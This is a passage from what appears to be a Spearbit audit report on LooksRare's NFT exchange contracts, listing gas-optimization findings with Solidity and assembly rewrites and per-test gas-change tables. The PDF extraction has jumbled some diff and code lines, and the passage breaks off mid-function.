testFloorFromChainlinkPremiumWrongCurrency() (gas: -1 (-0.000%)) testFloorFromChainlinkPremiumBidTooLow() (gas: -1 (-0.000%)) testFloorFromChainlinkPremiumBidTooLow() (gas: -1 (-0.000%)) testCannotExecuteOrderIfWrongUserGlobalAskNonce() (gas: -1 (-0.000%)) testInactiveStrategy() (gas: -1 (-0.000%)) testInactiveStrategy() (gas: -1 (-0.000%)) testFloorFromChainlinkPremiumTakerBidAmountNotOne() (gas: -1 (-0.000%)) testFloorFromChainlinkPremiumTakerBidAmountNotOne() (gas: -1 (-0.000%)) testFloorFromChainlinkPremiumMakerAskTakerBidItemIdsMismatch() (gas: -1 (-0.000%)) 25 testFloorFromChainlinkPremiumMakerAskTakerBidItemIdsMismatch() (gas: -1 (-0.000%)) testCannotExecuteOrderIfSubsetNonceIsUsed() (gas: -1 (-0.000%)) testFloorFromChainlinkPremiumOraclePriceNotRecentEnough() (gas: -1 (-0.001%)) testFloorFromChainlinkPremiumOraclePriceNotRecentEnough() (gas: -1 (-0.001%)) testFloorFromChainlinkPremiumMakerAskAmountNotOne() (gas: -1 (-0.001%)) testFloorFromChainlinkPremiumMakerAskAmountNotOne() (gas: -1 (-0.001%)) testFloorFromChainlinkPremiumMakerAskAmountsLengthNotOne() (gas: -1 (-0.001%)) testFloorFromChainlinkPremiumMakerAskAmountsLengthNotOne() (gas: -1 (-0.001%)) testFloorFromChainlinkPremiumMakerAskItemIdsLengthNotOne() (gas: -1 (-0.001%)) testFloorFromChainlinkPremiumMakerAskItemIdsLengthNotOne() (gas: -1 (-0.001%)) testTakerBidTooLow() (gas: -1 (-0.001%)) testInactiveStrategy() (gas: -1 (-0.001%)) testItemIdsMismatch() (gas: -1 (-0.001%)) testFloorFromChainlinkPremiumChainlinkPriceLessThanOrEqualToZero() (gas: -2 (-0.001%)) testFloorFromChainlinkPremiumChainlinkPriceLessThanOrEqualToZero() (gas: -2 (-0.001%)) testFloorFromChainlinkPremiumPriceFeedNotAvailable() (gas: -1 (-0.001%)) testFloorFromChainlinkPremiumPriceFeedNotAvailable() (gas: -1 (-0.001%)) testAmountGreaterThanOneForERC721() (gas: -1 (-0.001%)) testZeroAmount() (gas: -1 (-0.001%)) testOraclePriceNotRecentEnough() (gas: -1 (-0.001%)) testItemIdsAndAmountsLengthMismatch() (gas: -1 (-0.001%)) testUSDDynamicAskInvalidChainlinkPrice() (gas: -2 (-0.001%)) testTakerAskMultipleOrdersSignedERC721WrongMerkleProof() (gas: -154 (-0.001%)) testZeroItemIdsLength() (gas: -1 (-0.001%)) testCannotExecuteTransactionIfMakerAskWithStrategyForMakerBid() (gas: -154 (-0.007%)) testDutchAuction(uint256) (gas: -149 (-0.013%)) testTakerAskCannotExecuteWithWrongProof(uint256) (gas: -154 (-0.013%)) testTakerAskPriceTooHigh() (gas: -154 (-0.013%)) testTakerAskUnsortedItemIds() (gas: -154 (-0.013%)) testTakerAskDuplicatedItemIds() (gas: -154 (-0.013%)) testTakerAskOfferedAmountNotEqualToDesiredAmount() (gas: -154 (-0.013%)) testMakerBidAmountLengthIsNotOne() (gas: -154 (-0.013%)) testInactiveStrategy() (gas: -154 (-0.013%)) testInactiveStrategy() (gas: -154 (-0.014%)) testTakerAskReentrancy() (gas: -154 (-0.015%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -154 (-0.017%)) testTakerBidERC721BundleWithRoyaltiesFromRegistry() (gas: -149 (-0.019%)) testCreatorRoyaltiesRevertIfFeeHigherThanLimit() (gas: -155 (-0.021%)) testTakerBidERC721WithRoyaltiesFromRegistry(uint256) (gas: -149 (-0.021%)) testTakerBidERC721BundleNoRoyalties() (gas: -149 (-0.021%)) testTakerBidERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -149 (-0.021%)) testTakerBidERC721WithAffiliateButWithoutRoyalty() (gas: -149 (-0.022%)) testTakerAskCollectionOrderWithMerkleTreeERC721() (gas: -302 (-0.023%)) testTokenIdsRangeERC721() (gas: -302 (-0.024%)) testTakerBidERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -149 (-0.024%)) testMakerBidItemIdsLengthIsNotTwo() (gas: -308 (-0.025%)) testCannotExecuteAnOrderWhoseNonceIsCancelled() (gas: -154 (-0.025%)) testTakerAskRevertIfAmountIsZeroOrGreaterThanOneERC721() (gas: -308 (-0.026%)) testMakerBidItemIdsLowerBandHigherThanOrEqualToUpperBand() (gas: -308 (-0.026%)) testTokenIdsRangeERC1155() (gas: -302 (-0.026%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -302 (-0.028%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -302 (-0.030%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -308 (-0.031%)) testZeroAmount() (gas: -154 (-0.031%)) testBidAskAmountMismatch() (gas: -154 (-0.032%)) testPriceMismatch() (gas: -154 (-0.032%)) testCannotExecuteAnotherOrderAtNonceIfExecutionIsInProgress() (gas: -456 (-0.036%)) testCreatorRebatesArePaidForRoyaltyFeeManagerWithBundles() (gas: -302 (-0.037%)) testCreatorRoyaltiesGetPaidForRoyaltyFeeManagerWithBundles() (gas: -302 (-0.037%)) testMultiFill() (gas: -604 (-0.039%)) testTakerAskERC721BundleWithRoyaltiesFromRegistry() (gas: -302 (-0.039%)) testTakerBidCannotTransferSandboxWithERC721AssetTypeButERC1155AssetTypeWorks() (gas: -150 (-0.041%)) 26 testTakerAskERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -302 (-0.043%)) testTakerAskERC721BundleNoRoyalties() (gas: -302 (-0.044%)) testTakerAskERC721WithRoyaltiesFromRegistry(uint256) (gas: -302 (-0.044%)) testCreatorRoyaltiesGetPaidForRoyaltyFeeManager() (gas: -302 (-0.045%)) testCreatorRebatesArePaidForRoyaltyFeeManager() (gas: -302 (-0.045%)) testTakerAskERC721WithAffiliateButWithoutRoyalty() (gas: -302 (-0.046%)) testCreatorRoyaltiesGetPaidForERC2981() (gas: -302 (-0.046%)) testCreatorRebatesArePaidForERC2981() (gas: -302 (-0.046%)) testTakerBidGasGriefing() (gas: -149 (-0.046%)) testFloorFromChainlinkPremiumBasisPointsDesiredSalePriceLessThanMinPrice() (gas: -149 (-0.047%)) testFloorFromChainlinkPremiumFixedAmountDesiredSalePriceEqualToMinPrice() (gas: -149 (-0.047%)) testFloorFromChainlinkPremiumFixedAmountDesiredSalePriceLessThanMinPrice() (gas: -149 (-0.047%)) testFloorFromChainlinkPremiumFixedAmountDesiredSalePriceGreaterThanMinPrice() (gas: -149 (-0.047%)) testFloorFromChainlinkPremiumBasisPointsDesiredSalePriceGreaterThanMinPrice() (gas: -149 (-0.048%)) testFloorFromChainlinkPremiumBasisPointsDesiredSalePriceEqualToMinPrice() (gas: -149 (-0.048%)) testTakerAskCollectionOrderERC721(uint256) (gas: -302 (-0.050%)) testTakerAskERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -302 (-0.051%)) testUSDDynamicAskBidderOverpaid() (gas: -149 (-0.053%)) testUSDDynamicAskUSDValueLessThanMinAcceptedEthValue() (gas: -149 (-0.053%)) testUSDDynamicAskUSDValueLessThanOneETH() (gas: -149 (-0.053%)) testUSDDynamicAskUSDValueGreaterThanOrEqualToMinAcceptedEthValue() (gas: -149 (-0.053%)) testAmountsMismatch() (gas: -308 (-0.054%)) testItemIdsLengthNotOne() (gas: -308 (-0.054%)) testAmountsLengthNotOne() (gas: -308 (-0.054%)) testCannotExecuteAnOrderTwice() (gas: -456 (-0.067%)) testFloorFromChainlinkDiscountWrongCurrency() (gas: -154 (-0.072%)) testFloorFromChainlinkDiscountWrongCurrency() (gas: -154 (-0.072%)) testFloorFromChainlinkDiscountAskTooHigh() (gas: -154 (-0.073%)) testFloorFromChainlinkDiscountAskTooHigh() (gas: -154 (-0.073%)) testInactiveStrategy() (gas: -154 (-0.073%)) testFloorFromChainlinkDiscountBasisPointsDesiredDiscountBasisPointsEqualTo10000() (gas: -154 (-0.073%)) testInactiveStrategy() (gas: -154 (-0.074%)) testFloorFromChainlinkDiscountTakerAskZeroAmount() (gas: -154 (-0.074%)) testFloorFromChainlinkDiscountTakerAskZeroAmount() (gas: -154 (-0.075%)) testFloorFromChainlinkDiscountTakerAskAmountsLengthNotOne() (gas: -154 (-0.075%)) testFloorFromChainlinkDiscountTakerAskAmountsLengthNotOne() (gas: -154 (-0.075%)) testFloorFromChainlinkDiscountTakerAskItemIdsLengthNotOne() (gas: -154 (-0.075%)) testFloorFromChainlinkDiscountTakerAskItemIdsLengthNotOne() (gas: -154 (-0.075%)) testCannotExecuteOrderIfWrongUserGlobalBidNonce() (gas: -154 (-0.079%)) testFloorFromChainlinkDiscountOraclePriceNotRecentEnough() (gas: -154 (-0.081%)) testFloorFromChainlinkDiscountOraclePriceNotRecentEnough() (gas: -154 (-0.082%)) testFloorFromChainlinkDiscountMakerBidAmountNotOne() (gas: -154 (-0.082%)) testFloorFromChainlinkDiscountMakerBidAmountNotOne() (gas: -154 (-0.082%)) testFloorFromChainlinkDiscountMakerBidAmountsLengthNotOne() (gas: -154 (-0.083%)) testFloorFromChainlinkDiscountMakerBidAmountsLengthNotOne() (gas: -154 (-0.083%)) testWrongAmounts() (gas: -616 (-0.084%)) testFloorFromChainlinkDiscountChainlinkPriceLessThanOrEqualToZero() (gas: -308 (-0.091%)) testFloorFromChainlinkDiscountChainlinkPriceLessThanOrEqualToZero() (gas: -308 (-0.091%)) testFloorFromChainlinkDiscountPriceFeedNotAvailable() (gas: -154 (-0.093%)) testFloorFromChainlinkDiscountPriceFeedNotAvailable() (gas: -154 (-0.093%)) testFloorFromChainlinkDiscountBasisPointsDesiredDiscountedPriceGreaterThanOrEqualToMaxPrice() (gas: ,! testFloorFromChainlinkDiscountBasisPointsDesiredDiscountedPriceLessThanMaxPrice() (gas: -302 (-0.097%)) testFloorFromChainlinkDiscountFixedAmountDesiredDiscountedPriceGreaterThanOrEqualToMaxPrice() (gas: ,! testFloorFromChainlinkDiscountFixedAmountDesiredDiscountedPriceLessThanMaxPrice() (gas: -302 (-0.098%)) testMerkleRootLengthIsNot32() (gas: -154 (-0.107%)) testCannotTradeIfETHIsUsedForMakerBid() (gas: -154 (-0.108%)) testFloorFromChainlinkDiscountFixedAmountDesiredDiscountedAmountGreaterThanOrEqualToFloorPrice() (gas: ,! testTakerAskCannotTransferSandboxWithERC721AssetTypeButERC1155AssetTypeWorks() (gas: -456 (-0.128%)) testCannotValidateOrderIfWrongFormat() (gas: -930 (-0.161%)) -308 (-0.112%)) -302 (-0.097%)) -302 (-0.098%)) 27 testCannotValidateOrderIfWrongTimestamps() (gas: -462 (-0.183%)) Overall gas change: -23356 (-5.321%) LooksRare: Fixed in PR 323. Spearbit: Verfied. +5.4.5 Cache operators[i] in grantApprovals and revokeApprovals Severity: Gas Optimization Context: • TransferManager.sol#L177-L192 • TransferManager.sol#L207-L216 Description: operators[i] is used 3 times in grantApprovals's (and twice in revokeApprovals) for loop. Recommendation: One can optimize the loop by caching operators[i]: @@ -175,15 +175,16 @@ contract TransferManager is ITransferManager, LowLevelERC721Transfer, LowLevelER - + + - + - + } for (uint256 i; i < length; ) { if (!isOperatorWhitelisted[operators[i]]) { address operator = operators[i]; if (!isOperatorWhitelisted[operator]) { revert NotWhitelisted(); } if (hasUserApprovedOperator[msg.sender][operators[i]]) { if (hasUserApprovedOperator[msg.sender][operator]) { revert AlreadyApproved(); } hasUserApprovedOperator[msg.sender][operators[i]] = true; hasUserApprovedOperator[msg.sender][operator] = true; unchecked { ++i; @@ -205,11 +206,12 @@ contract TransferManager is ITransferManager, LowLevelERC721Transfer, LowLevelER } - + + - + for (uint256 i; i < length; ) { if (!hasUserApprovedOperator[msg.sender][operators[i]]) { address operator = operators[i]; if (!hasUserApprovedOperator[msg.sender][operator]) { revert NotApproved(); } delete hasUserApprovedOperator[msg.sender][operators[i]]; delete hasUserApprovedOperator[msg.sender][operator]; unchecked { ++i; } testUserCannotGrantApprovalsIfNotWhitelisted() (gas: -1 (-0.008%)) testUserCannotRevokeApprovalsIfNotApproved() (gas: 2 (0.017%)) testCannotExecuteTransactionIfMakerBidWithStrategyForMakerAsk() (gas: -884 (-0.039%)) testCannotExecuteTransactionIfMakerAskWithStrategyForMakerBid() (gas: -884 (-0.039%)) testExecuteMultipleTakerBidsReentrancy() (gas: -442 (-0.040%)) testTakerBidReentrancy() (gas: -442 (-0.043%)) 28 testTakerAskReentrancy() (gas: -442 (-0.044%)) testMultipleTakerBidsERC721WithAffiliateButWithoutRoyalty() (gas: -884 (-0.060%)) testTakerAskCollectionOrderWithMerkleTreeERC721() (gas: -884 (-0.069%)) testCannotExecuteAnotherOrderAtNonceIfExecutionIsInProgress() (gas: -884 (-0.070%)) testTokenIdsRangeERC721() (gas: -884 (-0.070%)) testMakerBidItemIdsLengthIsNotTwo() (gas: -884 (-0.072%)) testTakerAskCannotExecuteWithWrongProof(uint256) (gas: -884 (-0.074%)) testTakerAskRevertIfAmountIsZeroOrGreaterThanOneERC721() (gas: -884 (-0.074%)) testMakerBidItemIdsLowerBandHigherThanOrEqualToUpperBand() (gas: -884 (-0.074%)) testWrongAmounts() (gas: -884 (-0.075%)) testDutchAuction(uint256) (gas: -884 (-0.076%)) testTokenIdsRangeERC1155() (gas: -884 (-0.076%)) testTakerAskPriceTooHigh() (gas: -884 (-0.076%)) testTakerAskUnsortedItemIds() (gas: -884 (-0.076%)) testTakerAskDuplicatedItemIds() (gas: -884 (-0.076%)) testTakerAskOfferedAmountNotEqualToDesiredAmount() (gas: -884 (-0.076%)) testMakerBidAmountLengthIsNotOne() (gas: -884 (-0.077%)) testInactiveStrategy() (gas: -884 (-0.077%)) testInactiveStrategy() (gas: -884 (-0.079%)) testTakerBidTooLow(uint256) (gas: -884 (-0.080%)) testItemIdsMismatch() (gas: -884 (-0.081%)) testStartPriceTooLow() (gas: -884 (-0.081%)) testItemIdsAndAmountsLengthMismatch() (gas: -884 (-0.081%)) testInactiveStrategy() (gas: -884 (-0.081%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -884 (-0.082%)) testThreeTakerBidsERC721OneFails() (gas: -884 (-0.085%)) testZeroItemIdsLength() (gas: -884 (-0.085%)) testMultiFill() (gas: -1326 (-0.086%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -884 (-0.088%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -884 (-0.090%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -884 (-0.096%)) testCreatorRebatesArePaidForRoyaltyFeeManagerWithBundles() (gas: -884 (-0.107%)) testCreatorRoyaltiesGetPaidForRoyaltyFeeManagerWithBundles() (gas: -884 (-0.107%)) testTakerBidERC721BundleWithRoyaltiesFromRegistry() (gas: -884 (-0.114%)) testThreeTakerBidsERC721() (gas: -884 (-0.114%)) testTakerAskERC721BundleWithRoyaltiesFromRegistry() (gas: -884 (-0.115%)) testCreatorRoyaltiesRevertIfFeeHigherThanLimit() (gas: -884 (-0.121%)) testWrongAmounts() (gas: -884 (-0.121%)) testTakerAskERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -884 (-0.125%)) testTakerBidERC721BundleNoRoyalties() (gas: -884 (-0.127%)) testTakerBidERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -884 (-0.127%)) testTakerAskERC721BundleNoRoyalties() (gas: -884 (-0.128%)) testTakerBidERC721WithRoyaltiesFromRegistry(uint256) (gas: -904 (-0.130%)) testCannotExecuteAnOrderTwice() (gas: -884 (-0.130%)) testCreatorRoyaltiesGetPaidForRoyaltyFeeManager() (gas: -884 (-0.131%)) testCreatorRebatesArePaidForRoyaltyFeeManager() (gas: -884 (-0.131%)) testTakerBidERC721WithAffiliateButWithoutRoyalty() (gas: -884 (-0.132%)) testTakerAskERC721WithAffiliateButWithoutRoyalty() (gas: -884 (-0.134%)) testTakerAskERC721WithRoyaltiesFromRegistry(uint256) (gas: -924 (-0.135%)) testCreatorRoyaltiesGetPaidForERC2981() (gas: -884 (-0.135%)) testCreatorRebatesArePaidForERC2981() (gas: -884 (-0.136%)) testCannotExecuteMultipleTakerBidsIfDifferentCurrencies() (gas: -884 (-0.141%)) testTakerBidERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -884 (-0.144%)) testCannotExecuteAnOrderWhoseNonceIsCancelled() (gas: -884 (-0.145%)) testTakerAskCollectionOrderERC721(uint256) (gas: -884 (-0.146%)) testCannotTradeIfWrongAmounts() (gas: -884 (-0.146%)) testTakerAskERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -884 (-0.148%)) testAmountsMismatch() (gas: -884 (-0.154%)) testItemIdsLengthNotOne() (gas: -884 (-0.154%)) testAmountsLengthNotOne() (gas: -884 (-0.155%)) testCannotTradeIfWrongCurrency() (gas: -884 (-0.161%)) testTransferBatchItemsAcrossCollectionERC721AndERC1155() (gas: -442 (-0.168%)) 29 (-0.190%)) testCannotTransferIfNoManagerSelectorForAssetType() (gas: -884 (-0.171%)) testZeroAmount() (gas: -884 (-0.181%)) testBidAskAmountMismatch() (gas: -884 (-0.184%)) testPriceMismatch() (gas: -884 (-0.185%)) testCannotTradeIfDomainSeparatorHasBeenUpdated() (gas: -884 (-0.189%)) testTransferBatchItemsAcrossCollectionPerCollectionAmountsAndItemIdsLengthMismatch() (gas: -442 ,! testTransferBatchItemsAcrossCollectionPerCollectionItemIdsLengthZero() (gas: -442 (-0.191%)) testCannotTradeIfChainIdHasChanged() (gas: -884 (-0.196%)) testTransferBatchItemsSameERC721() (gas: -442 (-0.201%)) testThreeTakerBidsERC721WrongLengths() (gas: -884 (-0.204%)) testCannotCallRestrictedExecuteTakerBid() (gas: -884 (-0.207%)) testTransferBatchItemsSameERC1155() (gas: -442 (-0.221%)) testTransferSingleItemERC721() (gas: -442 (-0.237%)) testTransferSingleItemERC1155() (gas: -442 (-0.266%)) testTransferBatchItemsAcrossCollectionWrongAssetTypesLength() (gas: -442 (-0.334%)) testTransferBatchItemsAcrossCollectionWrongAmountsLength() (gas: -442 (-0.336%)) testTransferBatchItemsAcrossCollectionWrongItemIdsLength() (gas: -442 (-0.336%)) testTransferBatchItemsAcrossCollectionZeroCollectionsLength() (gas: -442 (-0.336%)) testCannotBatchTransferIfAssetTypeIsNotZeroOrOne() (gas: -442 (-0.336%)) testUserCannotGrantApprovalsIfAlreadyApproved() (gas: -659 (-0.515%)) testCannotBatchTransferIfOperatorApprovalsRevoked() (gas: -1095 (-0.735%)) testCannotTransferERC1155IfOperatorApprovalsRevokedByUserOrOperatorRemovedByOwner() (gas: -1095 ,! testCannotTransferERC721IfOperatorApprovalsRevokedByUserOrOperatorRemovedByOwner() (gas: -1095 ,! Overall gas change: -72955 (-13.980%) (-0.766%)) (-0.767%)) LooksRare: Fixed in PR 316. Spearbit: Verified. +5.4.6 recipients[0] is never used Severity: Gas Optimization Context: • ExecutionManager.sol#L169 • ExecutionManager.sol#L255 • LooksRareProtocol.sol#L452 In _- Description: recipients[0] is set to protocolFeeRecipient. But its value is never used afterward. payProtocolFeeAndAffiliateFee, the fees[0] amount is manually distributed to an affiliate if any and the pro- tocolFeeRecipient. Recommendation: recipients can be made into an address[2] array (by removing the element corresponding to protocolFeeRecipient) and fees elements can be rearranged so that fees[2] corresponds to the fee directed to the protocol and an affiliate. LooksRare: Fixed in PR 314 and PR 371. The order of fungible token transfers have been swapped. The seller is paid 1st then the creator. Spearbit: Verified. 30 +5.4.7 currency validation can be optimized/refactored Severity: Gas Optimization Context: • StrategyUSDDynamicAsk.sol#L86-L90 • StrategyUSDDynamicAsk.sol#L163-L167 • StrategyFloorFromChainlink.sol#L62-L66 • StrategyFloorFromChainlink.sol#L116-L120 Description: In the context above we are enforcing only native tokens or WETH to be supplied. The if statement can be simplified and refactored into a utility function (possibly defined in either BaseStrategy or in BaseStrate- gyChainlinkPriceLatency): if (makerAsk.currency != address(0)) { if (makerAsk.currency != WETH) { revert WrongCurrency(); } } Recommendation: Refactor and simplify /* * * * * */ error WrongCurrency() Memory layout: - 0x00: Left-padded selector (data begins at 0x1c) Revert buffer is memory[0x1c:0x20] uint256 constant WrongCurrency_error_selector = 0x164fb6c2; uint256 constant WrongCurrency_error_length = 0x04; uint256 constant Error_selector_offset = 0x1c; function _allowNativeOrSupplied(address currency, address supplied) internal pure { assembly { if mul(currency, iszero(eq(currency, supplied))) { mstore(0x00, WrongCurrency_error_selector) revert(Error_selector_offset, WrongCurrency_error_length) } } } Note: _allowNativeOrSupplied takes into consideration potential dirty bytes of currency and supplied. LooksRare: Fixed in PR 306. Spearbit: Verified. 31 +5.4.8 validating amount can be simplified and possibly refactored Severity: Gas Optimization Context: • InheritedStrategy.sol#L113-L120 • StrategyCollectionOffer.sol#L56-L63 • StrategyCollectionOffer.sol#L97-L104 • StrategyDutchAuction.sol#L43-L50 • StrategyItemIdsRange.sol#L62-L69 • StrategyUSDDynamicAsk.sol#L72-L79 and: • StrategyUSDDynamicAsk.sol#L149-L156 • StrategyDutchAuction.sol#L108-L115 Description: In the context above, we are trying to invalidate orders that have 0 amounts or an amount other than 1 when the asset if an ERC721 if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } The above snippet can be simplified into: if (amount == 0 or (amount != 1 and assetType == 0)) { revert OrderInvalid(); } Recommendation: It is suggested to use the above simplified version or even an assembly block /* * * * * */ error OrderInvalid() Memory layout: - 0x00: Left-padded selector (data begins at 0x1c) Revert buffer is memory[0x1c:0x20] uint256 constant OrderInvalid_error_selector = 0x2e0c0f71; uint256 constant OrderInvalid_error_length = 0x04; uint256 constant Error_selector_offset = 0x1c; ... assembly { let invalidOrder := or( iszero(amount), and(xor(amount, 1), iszero(assetType))) ) if invalidOrder { mstore(0x00, OrderInvalid_error_selector) revert(Error_selector_offset, OrderInvalid_error_length) } } 32 It would also be great to refactor these validations into a utility function that can be used across the board: function _validateAmount(uint256 amount, uint256 assetType) internal pure { assembly { let invalidOrder := or( iszero(amount), and(xor(amount, 1), iszero(assetType))) ) if invalidOrder { mstore(0x00, OrderInvalid_error_selector) revert(Error_selector_offset, OrderInvalid_error_length) } } } For the special cases: • StrategyUSDDynamicAsk.sol#L149-L156 • StrategyDutchAuction.sol#L108-L115 We would need to return instead of revert. LooksRare: Fixed in PR 305 and PR 364. Spearbit: Verified. +5.4.9 _verifyMatchingItemIdsAndAmountsAndPrice can be further optimized Severity: Gas Optimization Context: • InheritedStrategy.sol#L59 Description: _verifyMatchingItemIdsAndAmountsAndPrice's validation logic uses more opcodes than is neces- sary. Also, the whole function can be turned into an assembly block to further optimized this function. Examples of simplifications for if conditions or(X, gt(Y, 0)) or(X, Y) // simplified version or(X, iszero(eq(Y,Z))) or(X, xor(Y, Z)) // simplified version The nested if block below if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } can be simplified into 33 if (amount == 0) { revert OrderInvalid(); } if ((amount != 1) && (assetType == 0)) { revert OrderInvalid(); } Recommendation: Here is a sketch of a low-level implementation that includes the optimization and also utilizes inline-assembly further: /* * * * * */ error OrderInvalid() Memory layout: - 0x00: Left-padded selector (data begins at 0x1c) Revert buffer is memory[0x1c:0x20] uint256 constant OrderInvalid_error_selector = 0x2e0c0f71; uint256 constant OrderInvalid_error_length = 0x04; uint256 constant Error_selector_offset = 0x1c; uint256 constant OneWord = 0x20; function _verifyMatchingItemIdsAndAmountsAndPrice( uint256 assetType, uint256[] calldata amounts, uint256[] calldata counterpartyAmounts, uint256[] calldata itemIds, uint256[] calldata counterpartyItemIds, uint256 price, uint256 counterpartyPrice ) private pure { assembly { let end { /* amountsLength == 0 || // If A == B, then A XOR B == 0. So if all 4 are equal, it should be 0 | 0 | 0 == 0 ((amountsLength ^ itemIdsLength) | (amountsLength ^ counterpartyAmountsLength) | (amountsLength ^ counterpartyItemIdsLength)) != * if ( * * * * * * * * ) { * * } */ 0 || price != counterpartyPrice revert OrderInvalid(); let amountsLength := amounts.length let itemIdsLength := itemIds.length let counterpartyAmountsLength := counterpartyAmounts.length let counterpartyItemIdsLength := counterpartyItemIds.length if or( or(iszero(amountsLength), xor(price, counterpartyPrice)), or( or( ), xor(amountsLength, itemIdsLength), xor(amountsLength, counterpartyAmountsLength) 34 xor(amountsLength, counterpartyItemIdsLength) ) ) { mstore(0x00, OrderInvalid_error_selector) revert(Error_selector_offset, OrderInvalid_error_length) } end := shl(5, amountsLength) } let _assetType := assetType let amountsOffset := amounts.offset let itemIdsOffset := itemIds.offset let counterpartyAmountsOffset := counterpartyAmounts.offset let counterpartyItemIdsOffset := counterpartyItemIds.offset for {} end {} { end := sub(end, OneWord) let amount := calldataload(add(amountsOffset, end)) let invalidOrder { let itemId := calldataload(add(itemIdsOffset, end)) let counterpartyAmount := calldataload(add(counterpartyAmountsOffset, end)) let counterpartyItemId := calldataload(add(counterpartyItemIdsOffset, end)) invalidOrder := or( xor(amount, counterpartyAmount), xor(itemId, counterpartyItemId) ) } invalidOrder := or( invalidOrder, or( iszero(amount), and(xor(amount, 1), iszero(assetType))) ) ) if invalidOrder { mstore(0x00, OrderInvalid_error_selector) revert(Error_selector_offset, OrderInvalid_error_length) } } } } testTakerBidMultipleOrdersSignedERC721() (gas: -123 (-0.000%)) testTakerAskMultipleOrdersSignedERC721() (gas: -123 (-0.000%)) testPriceMismatch() (gas: -6 (-0.001%)) testBidAskAmountMismatch() (gas: -16 (-0.003%)) testCannotValidateOrderIfWrongFormat() (gas: -72 (-0.012%)) testTakerAskERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -123 (-0.017%)) testTakerBidERC721WithRoyaltiesFromRegistry(uint256) (gas: -123 (-0.018%)) testTakerBidERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -123 (-0.018%)) testTakerAskERC721WithRoyaltiesFromRegistry(uint256) (gas: -123 (-0.018%)) testCannotExecuteAnOrderTwice() (gas: -123 (-0.018%)) testCreatorRoyaltiesGetPaidForRoyaltyFeeManager() (gas: -123 (-0.018%)) testCreatorRebatesArePaidForRoyaltyFeeManager() (gas: -123 (-0.018%)) 35 testTakerBidERC721WithAffiliateButWithoutRoyalty() (gas: -123 (-0.018%)) testTakerAskERC721WithAffiliateButWithoutRoyalty() (gas: -123 (-0.019%)) testCreatorRoyaltiesGetPaidForERC2981() (gas: -123 (-0.019%)) testCreatorRebatesArePaidForERC2981() (gas: -123 (-0.019%)) testCannotExecuteMultipleTakerBidsIfDifferentCurrencies() (gas: -123 (-0.020%)) testTakerBidERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -123 (-0.020%)) testTakerAskERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -123 (-0.021%)) testCannotTransferIfNoManagerSelectorForAssetType() (gas: -123 (-0.024%)) testCreatorRoyaltiesRevertIfFeeHigherThanLimit() (gas: -246 (-0.034%)) testTakerBidGasGriefing() (gas: -123 (-0.038%)) testThreeTakerBidsERC721() (gas: -369 (-0.048%)) testCannotTradeIfWrongAmounts() (gas: -365 (-0.060%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -691 (-0.064%)) testMultipleTakerBidsERC721WithAffiliateButWithoutRoyalty() (gas: -984 (-0.067%)) testTakerBidCannotTransferSandboxWithERC721AssetTypeButERC1155AssetTypeWorks() (gas: -246 (-0.068%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -691 (-0.069%)) testTakerAskCannotTransferSandboxWithERC721AssetTypeButERC1155AssetTypeWorks() (gas: -246 (-0.069%)) testThreeTakerBidsERC721OneFails() (gas: -738 (-0.071%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -691 (-0.075%)) testThreeTakerBidsGasGriefing() (gas: -369 (-0.075%)) testCreatorRebatesArePaidForRoyaltyFeeManagerWithBundles() (gas: -691 (-0.084%)) testCreatorRoyaltiesGetPaidForRoyaltyFeeManagerWithBundles() (gas: -691 (-0.084%)) testTakerBidERC721BundleWithRoyaltiesFromRegistry() (gas: -691 (-0.089%)) testTakerAskERC721BundleWithRoyaltiesFromRegistry() (gas: -691 (-0.090%)) testTakerBidERC721BundleNoRoyalties() (gas: -691 (-0.099%)) testTakerAskERC721BundleNoRoyalties() (gas: -691 (-0.100%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -1382 (-0.140%)) Overall gas change: -13472 (-1.724%) Warning If the above implementation gets included, it is highly recommended to also include unit and differential tests against a high-level implementation. LooksRare: Fixed in PR 299. Spearbit: Verified. 5.5 Informational +5.5.1 In StrategyFloorFromChainlink premium amounts miss the related checks when compared to checks for discount amounts Severity: Informational Context: • StrategyFloorFromChainlink.sol#L79-L80 • StrategyFloorFromChainlink.sol#L133-L134 • StrategyFloorFromChainlink.sol#L184-L191 • StrategyFloorFromChainlink.sol#L241-L249 Description: For discount amounts, StrategyFloorFromChainlink has custom checks for the underflows (even though they will be caught by the compiler): 36 if (floorPrice <= discountAmount) { revert DiscountGreaterThanFloorPrice(); } uint256 desiredPrice = floorPrice - discountAmount; ... // @dev Discount cannot be 100% if (discount >= 10_000) { revert OrderInvalid(); } uint256 desiredPrice = (floorPrice * (10_000 - discount)) / 10_000; Similar checks for overflows for the premium are missing in the execution and validation endpoints (even though they will be caught by the compiler, floorPrice + premium or 10_000 + premium might overflow). Recommendation: Either document/comment why the checks are present for discount and missing for premium or implement similar ones for premium. The simplest method to recognize whether a sum overflows is to use assembly blocks function sumOverflows(uint256 a, uint256 b) internal pure returns (bool overflows) { assembly { overflows := 